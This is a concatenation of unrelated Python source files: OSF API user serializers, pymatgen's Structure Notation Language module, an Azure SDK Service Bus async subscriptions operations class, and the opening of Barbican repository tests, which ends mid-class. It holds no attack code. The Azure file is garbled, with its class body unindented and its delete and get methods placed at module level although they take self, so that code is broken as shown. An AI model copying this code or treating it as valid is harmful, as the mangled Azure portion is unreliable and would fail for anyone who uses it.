    # The addon's short name (e.g. 'github') doubles as the resource id.
    id = ser.CharField(source='config.short_name', read_only=True)
    user_has_auth = ser.BooleanField(source='has_auth', read_only=True)
    links = LinksField({
        'self': 'get_absolute_url',
        'accounts': 'account_links'
    })

    class Meta:
        type_ = 'user_addons'

    def get_absolute_url(self, obj):
        # Self link for this user/provider addon-detail endpoint.
        return absolute_reverse(
            'users:user-addon-detail',
            kwargs={
                'provider': obj.config.short_name,
                'user_id': self.context['request'].parser_context['kwargs']['user_id'],
                'version': self.context['request'].parser_context['kwargs']['version']
            }
        )

    def account_links(self, obj):
        # TODO: [OSF-4933] remove this after refactoring Figshare
        # Maps each connected external account id to its detail link and the
        # nodes it is attached to.
        if hasattr(obj, 'external_accounts'):
            return {
                account._id: {
                    'account': absolute_reverse('users:user-external_account-detail', kwargs={
                        'user_id': obj.owner._id,
                        'provider': obj.config.short_name,
                        'account_id': account._id,
                        'version': self.context['request'].parser_context['kwargs']['version']
                    }),
                    'nodes_connected': [n.absolute_api_v2_url for n in obj.get_attached_nodes(account)]
                }
                for account in obj.external_accounts.all()
            }
        return {}
class UserDetailSerializer(UserSerializer):
    """
    Overrides UserSerializer to make id required.
    """
    # Detail routes address one specific user, so the client must supply the id.
    id = IDField(source='_id', required=True)
class UserQuickFilesSerializer(QuickFilesSerializer):
    """Quickfiles serializer whose links point at waterbutler file actions."""
    links = LinksField({
        'info': Link('files:file-detail', kwargs={'file_id': '<_id>'}),
        'upload': WaterbutlerLink(),
        'delete': WaterbutlerLink(),
        'move': WaterbutlerLink(),
        # Only files (not folders) can be downloaded directly.
        'download': WaterbutlerLink(must_be_file=True),
    })
class ReadEmailUserDetailSerializer(UserDetailSerializer):
    """User detail serializer that additionally exposes the account email."""
    # The OSF username field holds the user's primary email address.
    email = ser.CharField(source='username', read_only=True)
class RelatedInstitution(JSONAPIRelationshipSerializer):
    """Relationship payload item referring to a single institution."""
    id = ser.CharField(required=False, allow_null=True, source='_id')

    class Meta:
        type_ = 'institutions'

    def get_absolute_url(self, obj):
        # Canonical API v2 URL of the related institution.
        return obj.absolute_api_v2_url
class UserInstitutionsRelationshipSerializer(BaseAPISerializer):
    """Serializes the user <-> institutions relationship endpoint."""
    data = ser.ListField(child=RelatedInstitution())
    links = LinksField({'self': 'get_self_url',
                        'html': 'get_related_url'})

    def get_self_url(self, obj):
        # obj is a dict; obj['self'] is the user whose institutions these are.
        return absolute_reverse('users:user-institutions-relationship', kwargs={
            'user_id': obj['self']._id,
            'version': self.context['request'].parser_context['kwargs']['version']
        })

    def get_related_url(self, obj):
        return absolute_reverse('users:user-institutions', kwargs={
            'user_id': obj['self']._id,
            'version': self.context['request'].parser_context['kwargs']['version']
        })

    def get_absolute_url(self, obj):
        return obj.absolute_api_v2_url

    class Meta:
        type_ = 'institutions'
class UserIdentitiesSerializer(JSONAPISerializer):
    """Serializes a user's external identities (e.g. linked login providers)."""
    id = IDField(source='_id', read_only=True)
    type = TypeField()
    external_id = ser.CharField(read_only=True)
    status = ser.CharField(read_only=True)
    links = LinksField({
        'self': 'get_absolute_url',
    })

    def get_absolute_url(self, obj):
        return absolute_reverse(
            'users:user-identities-detail',
            kwargs={
                'user_id': self.context['request'].parser_context['kwargs']['user_id'],
                'version': self.context['request'].parser_context['kwargs']['version'],
                # obj is subscriptable here; '_id' names the identity itself.
                'identity_id': obj['_id']
            }
        )

    class Meta:
        type_ = 'external-identities'
class UserAccountExportSerializer(BaseAPISerializer):
    """Payload serializer for requesting an export of account data."""
    type = TypeField()

    class Meta:
        type_ = 'user-account-export-form'
class UserAccountDeactivateSerializer(BaseAPISerializer):
    """Payload serializer for requesting account deactivation."""
    type = TypeField()

    class Meta:
        type_ = 'user-account-deactivate-form'
| |
# coding: utf-8
from __future__ import unicode_literals
"""
Classes and methods related to the Structure Notation Language (SNL)
"""
__author__ = 'Anubhav Jain, Shyue Ping Ong'
__credits__ = 'Dan Gunter'
__copyright__ = 'Copyright 2013, The Materials Project'
__version__ = '0.1'
__maintainer__ = 'Anubhav Jain'
__email__ = 'ajain@lbl.gov'
__date__ = 'Feb 11, 2013'
import sys
import re
import datetime
from collections import namedtuple
import json
from six.moves import map, cStringIO
from six import string_types
from monty.json import MontyDecoder, MontyEncoder
from monty.string import remove_non_ascii
from pymatgen.core.structure import Structure, Molecule
from pybtex.database.input import bibtex
from pybtex import errors
MAX_HNODE_SIZE = 64000 # maximum size (bytes) of SNL HistoryNode
MAX_DATA_SIZE = 256000 # maximum size (bytes) of SNL data field
MAX_HNODES = 100 # maximum number of HistoryNodes in SNL file
MAX_BIBTEX_CHARS = 20000 # maximum number of characters for BibTeX reference
def is_valid_bibtex(reference):
    """
    Use pybtex to validate that a reference is in proper BibTeX format.

    Args:
        reference: A String reference in BibTeX format.

    Returns:
        True if pybtex parsed at least one entry, False otherwise.
    """
    # pybtex seems to have an issue with unicode, so strip all non-ASCII
    # characters before handing the text over.
    parser = bibtex.Parser()
    errors.set_strict_mode(False)
    parsed = parser.parse_stream(cStringIO(remove_non_ascii(reference)))
    return len(parsed.entries) > 0
class HistoryNode(namedtuple('HistoryNode', ['name', 'url', 'description'])):
    """
    A HistoryNode is one step in the chain of events that produced a
    Structure -- a 'breadcrumb' recording where the Structure came from or
    what was done to it (e.g. fetched from the ICSD/CSD, or processed by a
    code such as pymatgen with a description of the transformation applied).

    Fields:

    .. attribute:: name

        Name of the code or resource encountered (String).

    .. attribute:: url

        URL of that code/resource (String).

    .. attribute:: description

        Free-form description of how the code/resource relates to the
        Structure (dict).
    """

    def as_dict(self):
        """Serialize this node to a plain dict."""
        return {"name": self.name,
                "url": self.url,
                "description": self.description}

    @staticmethod
    def from_dict(h_node):
        """Rebuild a HistoryNode from its dict representation."""
        return HistoryNode(h_node['name'], h_node['url'],
                           h_node['description'])

    @staticmethod
    def parse_history_node(h_node):
        """
        Parses a History Node object from either a dict or a tuple.

        Args:
            h_node: A dict with name/url/description fields or a 3-element
                tuple.

        Returns:
            History node.
        """
        if isinstance(h_node, dict):
            return HistoryNode.from_dict(h_node)
        if len(h_node) != 3:
            raise ValueError("Invalid History node, "
                             "should be dict or (name, version, "
                             "description) tuple: {}".format(h_node))
        return HistoryNode(*h_node)
class Author(namedtuple('Author', ['name', 'email'])):
    """
    An Author contains two fields:

    .. attribute:: name

        Name of author (String)

    .. attribute:: email

        Email of author (String)
    """

    def __str__(self):
        """
        String representation of an Author
        """
        return '{} <{}>'.format(self.name, self.email)

    def as_dict(self):
        """Serialize this author to a plain dict."""
        return {"name": self.name, "email": self.email}

    @staticmethod
    def from_dict(d):
        """Rebuild an Author from its dict representation."""
        return Author(d['name'], d['email'])

    @staticmethod
    def parse_author(author):
        """
        Parses an Author object from either a String, dict, or tuple

        Args:
            author: A String formatted as "NAME <email@domain.com>",
                (name, email) tuple, or a dict with name and email keys.

        Returns:
            An Author object.
        """
        if isinstance(author, string_types):
            # Regex looks for whitespace, (any name), whitespace, <, (email),
            # >, whitespace.
            # BUG FIX: the pattern is now a raw string; '\s' in a plain
            # string literal is an invalid escape sequence (SyntaxWarning
            # on modern Python).
            m = re.match(r'\s*(.*?)\s*<(.*?@.*?)>\s*', author)
            if not m or m.start() != 0 or m.end() != len(author):
                raise ValueError("Invalid author format! {}".format(author))
            return Author(m.groups()[0], m.groups()[1])
        elif isinstance(author, dict):
            return Author.from_dict(author)
        else:
            if len(author) != 2:
                raise ValueError("Invalid author, should be String or (name, "
                                 "email) tuple: {}".format(author))
            return Author(author[0], author[1])
class StructureNL(object):
    """
    The Structure Notation Language (SNL, pronounced 'snail') is container
    for a pymatgen Structure/Molecule object with some additional fields for
    enhanced provenance. It is meant to be imported/exported in a JSON file
    format with the following structure:

    - about
        - created_at
        - authors
        - projects
        - references
        - remarks
        - data
        - history
    - lattice (optional)
    - sites

    Args:
        struct_or_mol: A pymatgen.core.structure Structure/Molecule object
        authors: *List* of {"name":'', "email":''} dicts,
            *list* of Strings as 'John Doe <johndoe@gmail.com>',
            or a single String with commas separating authors
        projects: List of Strings ['Project A', 'Project B']
        references: A String in BibTeX format
        remarks: List of Strings ['Remark A', 'Remark B']
        data: A free form dict. Namespaced at the root level with an
            underscore, e.g. {"_materialsproject": <custom data>}
        history: List of dicts - [{'name':'', 'url':'', 'description':{}}]
        created_at: A datetime object
    """

    def __init__(self, struct_or_mol, authors, projects=None, references='',
                 remarks=None, data=None, history=None, created_at=None):
        # initialize root-level structure keys
        self.structure = struct_or_mol

        # turn authors into list of Author objects
        authors = authors.split(',') \
            if isinstance(authors, string_types) else authors
        self.authors = [Author.parse_author(a) for a in authors]

        # turn projects into list of Strings
        projects = projects if projects else []
        self.projects = [projects] \
            if isinstance(projects, string_types) else projects

        # check that references are valid BibTeX
        if references and not is_valid_bibtex(references):
            raise ValueError("Invalid format for SNL reference! Should be "
                             "BibTeX string.")
        if len(references) > MAX_BIBTEX_CHARS:
            raise ValueError("The BibTeX string must be fewer than {} chars "
                             ", you have {}"
                             .format(MAX_BIBTEX_CHARS, len(references)))
        self.references = references

        # turn remarks into list of Strings
        remarks = remarks if remarks else []
        self.remarks = [remarks] if isinstance(remarks, string_types) \
            else remarks

        # check remarks limit
        for r in self.remarks:
            if len(r) > 140:
                # BUG FIX: message previously read "...size of140 characters"
                raise ValueError("The remark exceeds the maximum size of "
                                 "140 characters: {}".format(r))

        # check data limit (note: sys.getsizeof is shallow -- it does not
        # follow references into contained objects)
        self.data = data if data else {}
        if not sys.getsizeof(self.data) < MAX_DATA_SIZE:
            raise ValueError("The data dict exceeds the maximum size limit of"
                             " {} bytes (you have {})"
                             .format(MAX_DATA_SIZE, sys.getsizeof(data)))

        for k, v in self.data.items():
            if not k.startswith("_"):
                # BUG FIX: a stray comma previously passed ``format(k)`` as a
                # second positional argument to ValueError instead of
                # formatting the message string.
                raise ValueError("data must contain properly namespaced data "
                                 "with keys starting with an underscore. The "
                                 "key {} does not start with an underscore."
                                 .format(k))

        # check for valid history nodes
        history = history if history else []  # initialize null fields
        if len(history) > MAX_HNODES:
            raise ValueError("A maximum of {} History nodes are supported, "
                             "you have {}!".format(MAX_HNODES, len(history)))
        self.history = [HistoryNode.parse_history_node(h) for h in history]
        if not all([sys.getsizeof(h) < MAX_HNODE_SIZE for h in history]):
            raise ValueError("One or more history nodes exceeds the maximum "
                             "size limit of {} bytes".format(MAX_HNODE_SIZE))

        self.created_at = created_at if created_at \
            else datetime.datetime.utcnow()

    def as_dict(self):
        """Serialize this SNL (structure plus provenance) to a JSON-able dict."""
        d = self.structure.as_dict()
        d["@module"] = self.__class__.__module__
        d["@class"] = self.__class__.__name__
        d["about"] = {"authors": [a.as_dict() for a in self.authors],
                      "projects": self.projects,
                      "references": self.references,
                      "remarks": self.remarks,
                      "history": [h.as_dict() for h in self.history],
                      "created_at": json.loads(json.dumps(self.created_at,
                                                          cls=MontyEncoder))}
        d["about"].update(json.loads(json.dumps(self.data,
                                                cls=MontyEncoder)))
        return d

    @classmethod
    def from_dict(cls, d):
        """Rebuild a StructureNL from the dict produced by :meth:`as_dict`."""
        a = d["about"]
        dec = MontyDecoder()
        created_at = dec.process_decoded(a.get("created_at"))
        # Underscore-prefixed keys in "about" are the namespaced data dict.
        data = {k: v for k, v in d["about"].items()
                if k.startswith("_")}
        data = dec.process_decoded(data)
        structure = Structure.from_dict(d) if "lattice" in d \
            else Molecule.from_dict(d)
        return cls(structure, a["authors"], projects=a.get("projects", None),
                   references=a.get("references", ""),
                   remarks=a.get("remarks", None), data=data,
                   history=a.get("history", None), created_at=created_at)

    @classmethod
    def from_structures(cls, structures, authors, projects=None,
                        references='', remarks=None, data=None,
                        histories=None, created_at=None):
        """
        A convenience method for getting a list of StructureNL objects by
        specifying structures and metadata separately. Some of the metadata
        is applied to all of the structures for ease of use.

        Args:
            structures: A list of Structure objects
            authors: *List* of {"name":'', "email":''} dicts,
                *list* of Strings as 'John Doe <johndoe@gmail.com>',
                or a single String with commas separating authors
            projects: List of Strings ['Project A', 'Project B']. This
                applies to all structures.
            references: A String in BibTeX format. Again, this applies to all
                structures.
            remarks: List of Strings ['Remark A', 'Remark B']
            data: A list of free form dict. Namespaced at the root level
                with an underscore, e.g. {"_materialsproject":<custom data>}
                . The length of data should be the same as the list of
                structures if not None.
            histories: List of list of dicts - [[{'name':'', 'url':'',
                'description':{}}], ...] The length of histories should be the
                same as the list of structures if not None.
            created_at: A datetime object
        """
        # BUG FIX: previously ``[{}] * len(structures)`` / ``[[]] * len(...)``
        # aliased one shared dict/list across every SNL, so mutating one
        # SNL's data mutated all of them.
        data = [{} for _ in structures] if data is None else data
        histories = [[] for _ in structures] if histories is None else \
            histories

        snl_list = []
        for i, struct in enumerate(structures):
            snl = StructureNL(struct, authors, projects=projects,
                              references=references,
                              remarks=remarks, data=data[i],
                              history=histories[i],
                              created_at=created_at)
            snl_list.append(snl)
        return snl_list

    def __str__(self):
        return "\n".join(["{}\n{}".format(k, getattr(self, k))
                          for k in ("structure", "authors", "projects",
                                    "references", "remarks", "data", "history",
                                    "created_at")])

    def __eq__(self, other):
        return all(map(lambda n: getattr(self, n) == getattr(other, n),
                       ("structure", "authors", "projects", "references",
                        "remarks", "data", "history", "created_at")))

    def __ne__(self, other):
        return not self.__eq__(other)
| |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from azure.mgmt.core.exceptions import ARMErrorFormat
from ... import models as _models
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class SubscriptionsOperations:
"""SubscriptionsOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.servicebus.v2017_04_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
    def list_by_topic(
        self,
        resource_group_name: str,
        namespace_name: str,
        topic_name: str,
        skip: Optional[int] = None,
        top: Optional[int] = None,
        **kwargs: Any
    ) -> AsyncIterable["_models.SBSubscriptionListResult"]:
        """List all the subscriptions under a specified topic.

        :param resource_group_name: Name of the Resource group within the Azure subscription.
        :type resource_group_name: str
        :param namespace_name: The namespace name.
        :type namespace_name: str
        :param topic_name: The topic name.
        :type topic_name: str
        :param skip: Skip is only used if a previous operation returned a partial result. If a previous
         response contains a nextLink element, the value of the nextLink element will include a skip
         parameter that specifies a starting point to use for subsequent calls.
        :type skip: int
        :param top: May be used to limit the number of results to the most recent N usageDetails.
        :type top: int
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: An iterator like instance of either SBSubscriptionListResult or the result of cls(response)
        :rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.servicebus.v2017_04_01.models.SBSubscriptionListResult]
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType["_models.SBSubscriptionListResult"]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        api_version = "2017-04-01"
        accept = "application/json"

        def prepare_request(next_link=None):
            # Build the GET request: the first page is constructed from the
            # operation's URL template; subsequent pages reuse the
            # service-supplied nextLink verbatim.
            # Construct headers
            header_parameters = {}  # type: Dict[str, Any]
            header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
            if not next_link:
                # Construct URL
                url = self.list_by_topic.metadata['url']  # type: ignore
                path_format_arguments = {
                    'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1),
                    'namespaceName': self._serialize.url("namespace_name", namespace_name, 'str', max_length=50, min_length=6),
                    'topicName': self._serialize.url("topic_name", topic_name, 'str', min_length=1),
                    'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
                }
                url = self._client.format_url(url, **path_format_arguments)
                # Construct parameters
                query_parameters = {}  # type: Dict[str, Any]
                query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
                if skip is not None:
                    query_parameters['$skip'] = self._serialize.query("skip", skip, 'int', maximum=1000, minimum=0)
                if top is not None:
                    query_parameters['$top'] = self._serialize.query("top", top, 'int', maximum=1000, minimum=1)
                request = self._client.get(url, query_parameters, header_parameters)
            else:
                url = next_link
                query_parameters = {}  # type: Dict[str, Any]
                request = self._client.get(url, query_parameters, header_parameters)
            return request

        async def extract_data(pipeline_response):
            # Deserialize one page; return (continuation token, page items).
            deserialized = self._deserialize('SBSubscriptionListResult', pipeline_response)
            list_of_elem = deserialized.value
            if cls:
                list_of_elem = cls(list_of_elem)
            return deserialized.next_link or None, AsyncList(list_of_elem)

        async def get_next(next_link=None):
            # Fetch one page, mapping HTTP error codes to typed exceptions.
            request = prepare_request(next_link)

            pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
            response = pipeline_response.http_response

            if response.status_code not in [200]:
                error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, response)
                map_error(status_code=response.status_code, response=response, error_map=error_map)
                raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)

            return pipeline_response

        return AsyncItemPaged(
            get_next, extract_data
        )
    list_by_topic.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ServiceBus/namespaces/{namespaceName}/topics/{topicName}/subscriptions'}  # type: ignore
    async def create_or_update(
        self,
        resource_group_name: str,
        namespace_name: str,
        topic_name: str,
        subscription_name: str,
        parameters: "_models.SBSubscription",
        **kwargs: Any
    ) -> "_models.SBSubscription":
        """Creates a topic subscription.

        :param resource_group_name: Name of the Resource group within the Azure subscription.
        :type resource_group_name: str
        :param namespace_name: The namespace name.
        :type namespace_name: str
        :param topic_name: The topic name.
        :type topic_name: str
        :param subscription_name: The subscription name.
        :type subscription_name: str
        :param parameters: Parameters supplied to create a subscription resource.
        :type parameters: ~azure.mgmt.servicebus.v2017_04_01.models.SBSubscription
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: SBSubscription, or the result of cls(response)
        :rtype: ~azure.mgmt.servicebus.v2017_04_01.models.SBSubscription
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType["_models.SBSubscription"]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        api_version = "2017-04-01"
        content_type = kwargs.pop("content_type", "application/json")
        accept = "application/json"

        # Construct URL
        url = self.create_or_update.metadata['url']  # type: ignore
        path_format_arguments = {
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1),
            'namespaceName': self._serialize.url("namespace_name", namespace_name, 'str', max_length=50, min_length=6),
            'topicName': self._serialize.url("topic_name", topic_name, 'str', min_length=1),
            'subscriptionName': self._serialize.url("subscription_name", subscription_name, 'str', max_length=50, min_length=1),
            'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
        }
        url = self._client.format_url(url, **path_format_arguments)

        # Construct parameters
        query_parameters = {}  # type: Dict[str, Any]
        query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')

        # Construct headers
        header_parameters = {}  # type: Dict[str, Any]
        header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
        header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')

        # Serialize the body and issue a PUT (create-or-update semantics).
        body_content_kwargs = {}  # type: Dict[str, Any]
        body_content = self._serialize.body(parameters, 'SBSubscription')
        body_content_kwargs['content'] = body_content
        request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
        pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response

        if response.status_code not in [200]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, response)
            raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)

        deserialized = self._deserialize('SBSubscription', pipeline_response)

        if cls:
            return cls(pipeline_response, deserialized, {})

        return deserialized
    create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ServiceBus/namespaces/{namespaceName}/topics/{topicName}/subscriptions/{subscriptionName}'}  # type: ignore
async def delete(
    self,
    resource_group_name: str,
    namespace_name: str,
    topic_name: str,
    subscription_name: str,
    **kwargs: Any
) -> None:
    """Deletes a subscription from the specified topic.

    :param resource_group_name: Name of the Resource group within the Azure subscription.
    :type resource_group_name: str
    :param namespace_name: The namespace name.
    :type namespace_name: str
    :param topic_name: The topic name.
    :type topic_name: str
    :param subscription_name: The subscription name.
    :type subscription_name: str
    :keyword callable cls: A custom type or function that will be passed the direct response
    :return: None, or the result of cls(response)
    :rtype: None
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    cls = kwargs.pop('cls', None)  # type: ClsType[None]
    error_map = {
        401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
    }
    error_map.update(kwargs.pop('error_map', {}))
    api_version = "2017-04-01"
    accept = "application/json"

    # Expand the metadata URL template with the validated path arguments.
    url = self.delete.metadata['url']  # type: ignore
    path_format_arguments = {
        'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1),
        'namespaceName': self._serialize.url("namespace_name", namespace_name, 'str', max_length=50, min_length=6),
        'topicName': self._serialize.url("topic_name", topic_name, 'str', min_length=1),
        'subscriptionName': self._serialize.url("subscription_name", subscription_name, 'str', max_length=50, min_length=1),
        'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
    }
    url = self._client.format_url(url, **path_format_arguments)

    # Query string and request headers.
    query_parameters = {
        'api-version': self._serialize.query("api_version", api_version, 'str'),
    }  # type: Dict[str, Any]
    header_parameters = {
        'Accept': self._serialize.header("accept", accept, 'str'),
    }  # type: Dict[str, Any]

    request = self._client.delete(url, query_parameters, header_parameters)
    pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
    response = pipeline_response.http_response

    # Both 200 and 204 are accepted as success for this operation.
    if response.status_code not in (200, 204):
        map_error(status_code=response.status_code, response=response, error_map=error_map)
        error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, response)
        raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)

    if cls:
        return cls(pipeline_response, None, {})
delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ServiceBus/namespaces/{namespaceName}/topics/{topicName}/subscriptions/{subscriptionName}'}  # type: ignore
async def get(
    self,
    resource_group_name: str,
    namespace_name: str,
    topic_name: str,
    subscription_name: str,
    **kwargs: Any
) -> "_models.SBSubscription":
    """Returns a subscription description for the specified topic.

    :param resource_group_name: Name of the Resource group within the Azure subscription.
    :type resource_group_name: str
    :param namespace_name: The namespace name.
    :type namespace_name: str
    :param topic_name: The topic name.
    :type topic_name: str
    :param subscription_name: The subscription name.
    :type subscription_name: str
    :keyword callable cls: A custom type or function that will be passed the direct response
    :return: SBSubscription, or the result of cls(response)
    :rtype: ~azure.mgmt.servicebus.v2017_04_01.models.SBSubscription
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    cls = kwargs.pop('cls', None)  # type: ClsType["_models.SBSubscription"]
    error_map = {
        401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
    }
    error_map.update(kwargs.pop('error_map', {}))
    api_version = "2017-04-01"
    accept = "application/json"

    # Expand the metadata URL template with the validated path arguments.
    url = self.get.metadata['url']  # type: ignore
    path_format_arguments = {
        'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1),
        'namespaceName': self._serialize.url("namespace_name", namespace_name, 'str', max_length=50, min_length=6),
        'topicName': self._serialize.url("topic_name", topic_name, 'str', min_length=1),
        'subscriptionName': self._serialize.url("subscription_name", subscription_name, 'str', max_length=50, min_length=1),
        'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
    }
    url = self._client.format_url(url, **path_format_arguments)

    # Query string and request headers.
    query_parameters = {
        'api-version': self._serialize.query("api_version", api_version, 'str'),
    }  # type: Dict[str, Any]
    header_parameters = {
        'Accept': self._serialize.header("accept", accept, 'str'),
    }  # type: Dict[str, Any]

    request = self._client.get(url, query_parameters, header_parameters)
    pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
    response = pipeline_response.http_response

    if response.status_code not in (200,):
        map_error(status_code=response.status_code, response=response, error_map=error_map)
        error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, response)
        raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)

    deserialized = self._deserialize('SBSubscription', pipeline_response)
    if cls:
        return cls(pipeline_response, deserialized, {})
    return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ServiceBus/namespaces/{namespaceName}/topics/{topicName}/subscriptions/{subscriptionName}'}  # type: ignore
| |
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import mock
import sqlalchemy
from barbican.common import config
from barbican.common import exception
from barbican.model import models
from barbican.model import repositories
from barbican.tests import database_utils
from barbican.tests import utils
class WhenCleaningRepositoryPagingParameters(utils.BaseTestCase):
    """Tests for repositories.clean_paging_values() offset/limit sanitizing."""

    def setUp(self):
        super(WhenCleaningRepositoryPagingParameters, self).setUp()
        self.CONF = config.CONF
        self.default_limit = self.CONF.default_limit_paging

    def test_parameters_not_assigned(self):
        """The cleaner should use defaults when params are not specified."""
        clean_offset, clean_limit = repositories.clean_paging_values()
        self.assertEqual(0, clean_offset)
        self.assertEqual(self.default_limit, clean_limit)

    def test_limit_as_none(self):
        """When limit is set to None it should use the default limit."""
        offset = 0
        clean_offset, clean_limit = repositories.clean_paging_values(
            offset_arg=offset,
            limit_arg=None)
        self.assertEqual(offset, clean_offset)
        self.assertEqual(self.default_limit, clean_limit)

    def test_offset_as_none(self):
        """When offset is set to None it should use an offset of 0."""
        clean_offset, clean_limit = repositories.clean_paging_values(
            offset_arg=None,
            limit_arg=self.default_limit)
        self.assertEqual(0, clean_offset)
        self.assertEqual(self.default_limit, clean_limit)

    def test_limit_as_uncastable_str(self):
        """When limit cannot be cast to an int, expect the default."""
        clean_offset, clean_limit = repositories.clean_paging_values(
            offset_arg=0,
            limit_arg='boom')
        self.assertEqual(0, clean_offset)
        self.assertEqual(self.default_limit, clean_limit)

    def test_offset_as_uncastable_str(self):
        """When offset cannot be cast to an int, it should be zero."""
        clean_offset, clean_limit = repositories.clean_paging_values(
            offset_arg='boom',
            limit_arg=self.default_limit)
        self.assertEqual(0, clean_offset)
        self.assertEqual(self.default_limit, clean_limit)

    def test_limit_is_less_than_one(self):
        """A limit below one should be clamped up to 1."""
        limit = -1
        clean_offset, clean_limit = repositories.clean_paging_values(
            offset_arg=1,
            limit_arg=limit)
        self.assertEqual(1, clean_offset)
        self.assertEqual(1, clean_limit)

    def test_limit_is_too_big(self):
        """Limit should max out at the configured maximum value."""
        limit = self.CONF.max_limit_paging + 10
        clean_offset, clean_limit = repositories.clean_paging_values(
            offset_arg=1,
            limit_arg=limit)
        self.assertEqual(self.CONF.max_limit_paging, clean_limit)
class WhenInvokingExceptionMethods(utils.BaseTestCase):
    """Tests for the module-level _raise_* helper functions in repositories."""

    def setUp(self):
        super(WhenInvokingExceptionMethods, self).setUp()
        self.CONF = config.CONF
        # Fixed entity identifiers so the expected messages below are exact.
        self.entity_id = '123456'
        self.entity_name = 'test_entity'

    def test_should_raise_for_entity_not_found(self):
        # Helper must raise NotFound naming both the entity type and its ID.
        exception_result = self.assertRaises(
            exception.NotFound,
            repositories._raise_entity_not_found,
            self.entity_name,
            self.entity_id)
        self.assertEqual(
            "No test_entity found with ID 123456",
            exception_result.message)

    def test_should_raise_for_entity_id_not_found(self):
        exception_result = self.assertRaises(
            exception.NotFound,
            repositories._raise_entity_id_not_found,
            self.entity_id)
        self.assertEqual(
            "Entity ID 123456 not found",
            exception_result.message)

    def test_should_raise_for_no_entities_found(self):
        exception_result = self.assertRaises(
            exception.NotFound,
            repositories._raise_no_entities_found,
            self.entity_name)
        self.assertEqual(
            "No entities of type test_entity found",
            exception_result.message)

    def test_should_raise_for_entity_already_exists(self):
        # Duplicate (not NotFound) is expected for the already-exists case.
        exception_result = self.assertRaises(
            exception.Duplicate,
            repositories._raise_entity_already_exists,
            self.entity_name)
        self.assertEqual(
            "Entity 'test_entity' already exists",
            exception_result.message)
class WhenTestingBaseRepository(database_utils.RepositoryTestCase):
    """Validation tests for the generic BaseRepo repository base class."""

    def setUp(self):
